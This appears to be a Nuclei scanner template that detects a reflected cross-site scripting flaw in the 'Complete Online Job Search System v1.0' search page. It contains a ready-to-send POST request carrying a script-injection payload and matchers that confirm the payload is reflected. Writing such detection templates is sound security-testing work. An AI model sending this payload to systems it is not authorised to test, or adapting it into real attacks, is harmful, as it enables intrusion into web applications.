id: eris-xss info: name: Complete Online Job Search System v1.0 - Reflected Cross Site Scripting author: arafatansari severity: medium description: | Complete Online Job Search System v1.0 is vulnerable to Reflected Cross Site Scripting via index.php?q=advancesearch. metadata: verified: true tags: cve,cve2022,xss,eris requests: - raw: - | POST /index.php?q=result&searchfor=advancesearch HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit matchers-condition: and matchers: - type: word part: body words: - 'Result : ' - 'ERIS' condition: and - type: word part: header words: - text/html - type: status status: - 200